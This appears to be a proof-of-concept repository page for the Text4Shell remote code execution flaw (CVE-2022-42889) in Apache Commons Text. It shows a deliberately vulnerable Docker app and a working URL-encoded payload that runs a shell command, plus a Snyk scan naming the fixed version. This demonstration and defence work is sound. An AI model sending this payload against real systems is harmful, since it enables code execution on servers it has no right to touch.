来源

关联漏洞

描述

CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

介绍

# CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

![image](img/text4shell_small.png)

Text4Shell is the popular name of a critical software vulnerability discovered in the Apache Commons Text library (see [CVE-2022-42889](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889)).

This repo is meant to demonstrate a **Remote Code Execution** (RCE) that leverages this CVE.

The [vulnerable code](https://github.com/sunnyvale-it/CVE-2022-42889-PoC/blob/3641b34510dfd12fe6482406b09811073c4e67d0/src/main/java/it/sunnyvale/text4shell/controller/Text4ShellController.java#L13) is being used in a SpringBoot controller but don't get confused, this __IS NOT__ a SpringBoot/Spring security issue.

Before testing the RCE, build the Docker image:

```console
$ docker build -t text4shell .
...
 => exporting to image                                                                                                                                                                                     0.0s
 => => exporting layers                                                                                                                                                                                    0.0s
 => => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f                                                                                                               0.0s
 => => naming to docker.io/library/text4shell
```

Then run the container:

```console
$ docker run --name text4shell --rm -ti  -p:8080:8080 text4shell
...
2022-11-05 09:11:03.798  INFO 1 --- [           main] it.sunnyvale.text4shell.Main             : Started Main in 1.376 seconds (JVM running for 1.713)
```

You can finally try to exploit the vulnerable application with a special crafted URL:

```console
$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}%
```

If you find a file named **p0wned** in the container's `/tmp` directory, the RCE executed successfully.

```console
$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r--    1 root     root             0 Nov  5 09:17 /tmp/p0wned
```

Scanning the image using Snyk, the vulnerable library is detected:

```console
$ docker scan text4shell | grep text
Testing text4shell...
Project name:      docker-image|text4shell
Docker image:      text4shell
Testing text4shell...
Upgrade org.apache.commons:commons-text@1.8 to org.apache.commons:commons-text@1.10.0 to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:commons-text@1.8
introduced by org.apache.commons:commons-text@1.8
Upgrade org.springframework:spring-context@5.1.3.RELEASE to org.springframework:spring-context@5.2.21.RELEASE to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:spring-context@5.1.3.RELEASE
introduced by org.springframework:spring-context@5.1.3.RELEASE
Project name:      text4shell:latest:/app
Docker image:      text4shell
```

文件快照

 [4.0K]  /data/pocs/7525e4359ac646d1b45bb23fd005ff4c356235f4
├── [ 292]  Dockerfile
├── [4.0K]  img
│   └── [ 23K]  text4shell_small.png
├── [1.6K]  pom.xml
├── [3.2K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [4.0K]  it
                └── [4.0K]  sunnyvale
                    └── [4.0K]  text4shell
                        ├── [4.0K]  controller
                        │   └── [ 787]  Text4ShellController.java
                        └── [ 300]  Main.java

8 directories, 6 files

备注